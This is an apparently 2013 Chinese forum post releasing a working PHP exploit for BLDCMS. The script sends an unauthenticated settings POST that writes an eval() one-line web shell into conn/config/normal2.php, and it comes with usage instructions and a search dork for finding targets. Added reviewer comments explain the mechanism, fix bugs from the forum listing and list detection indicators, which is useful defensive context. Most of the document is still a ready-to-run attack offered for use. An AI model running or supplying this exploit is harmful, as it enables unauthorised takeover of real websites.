之前想搞一个黑阔站，发现旁站有一个站用了BLDCMS，我就下载下来看了……找到了一个getshell漏洞。
话说昨晚晴天小铸在90sec发现有人把这个getshell漏洞的分析发出来了，擦，居然被人先发了。
既然都有人发了，我就把我之前写好的EXP放出来吧！
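<?php
/*
 * BLDCMS (白老大 PHP novel-scraper CMS) "getshell" proof of concept, as posted
 * by 数据流@wooyun, 2013-03-21, cleaned up from a forum listing.
 *
 * Mechanism (everything below is visible in the request this script builds):
 * one POST to admin/chuli.php?action=a_1, carrying the CMS settings form with
 * no session cookie or credentials, sets the `sqlite` field to a single quote
 * followed by eval($_POST["<pass>"]).  The settings are apparently written
 * verbatim into conn/config/normal2.php (the path the script reports back), so
 * with magic_quotes_gpc=Off the quote closes the string literal and the eval()
 * becomes live PHP in that file.  With magic_quotes_gpc=On the quote is
 * backslash-escaped and the payload is inert -- hence the "GPC=Off" caveat.
 *
 * Usage: php EXP.php <host> <cms dir, e.g. /cms/> <one-line shell password>
 *
 * Reviewer notes on this copy:
 *  - The hosting forum mangled the listing: "emptyempty()" is Discuz's rewrite
 *    of empty(), the request line had lost the "P" of "POST", and $eval was
 *    split across two lines.  Those are repaired here.
 *  - The original ignored $dir when building the request path, so an install
 *    not at the web root got a 404 while the success line was still printed.
 *    The path now honours $dir.
 *  - The response is still not inspected: the final echo is printed whether or
 *    not the write succeeded.  Confirm the printed URL by hand.
 *  - Detection: a POST to admin/chuli.php?action=a_1 whose sqlite= value
 *    contains a quote followed by eval( is an unambiguous indicator, as is
 *    an unexpected modification of conn/config/normal2.php.
 */

echo "-------------------------------------------------------------------------------\r\n"
   . " BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP(GPC=Off)\r\n"
   . " Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n"
   . " 2013.3.21\r\n"
   . " 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
   . " 搜索关键字:\"开发者: 白老大小说\"\r\n"
   . "-------------------------------------------------------------------------------\r\n";

// Guard every argv slot: the original only validated $url and $pass, so a
// missing $dir raised an undefined-index notice.
$url  = isset($argv[1]) ? $argv[1] : '';
$dir  = isset($argv[2]) ? $argv[2] : '';
$pass = isset($argv[3]) ? $argv[3] : '';

if (empty($pass) || empty($url)) {
    exit("请输入参数");
}

// Leading \' breaks out of the single-quoted config value; trailing \' reopens
// it so the written file stays syntactically valid.  $pass is sent raw (the
// original did not urlencode it), so it must not contain &, + or %.
$eval = '\';eval($_POST[' . '"' . $pass . '"' . ']);\'';

// The other fields only need to be present for the settings handler to run.
$fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;
$length   = strlen($fuckdata);

/**
 * Send the crafted settings POST to $url and print where the shell should be.
 *
 * @param string $url  target host name, no scheme (also used for Host:)
 * @param string $pass one-line shell password; kept for interface compatibility,
 *                     the payload itself is read from file-scope $fuckdata
 *
 * Reads $dir, $fuckdata and $length from file scope as the original did.
 * Exits the script on connect or write failure; never inspects the reply.
 */
function getshell($url, $pass)
{
    global $dir, $fuckdata, $length;

    // '/cms/' -> '/cms', '' -> '' ; avoids the '//cms//' the original printed.
    $base = rtrim('/' . trim($dir, '/'), '/');

    $request  = "POST " . $base . "/admin/chuli.php?action=a_1 HTTP/1.1\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "User-Agent: MSIE\r\n";
    $request .= "Host: " . $url . "\r\n";
    $request .= "Content-Length: " . $length . "\r\n";
    $request .= "Connection: Close\r\n";
    $request .= "\r\n";
    // Send exactly Content-Length bytes; the original appended an extra CRLFCRLF.
    $request .= $fuckdata;

    $fp = fsockopen($url, 80, $errno, $errstr, 15);
    if (!$fp) {
        exit("利用失败:请检查指定目标是否能正常打开");
    }
    if (!fputs($fp, $request)) {
        exit("利用失败");
    }

    // Drain the reply so the server finishes the request before we report.
    // NOTE(review): $receive is never examined -- success is assumed.
    $receive = '';
    while (!feof($fp)) {
        $receive .= @fgets($fp, 1000);
    }
    @fclose($fp);

    echo "$url$base/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
}

getshell($url, $pass);
?>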
by 数据流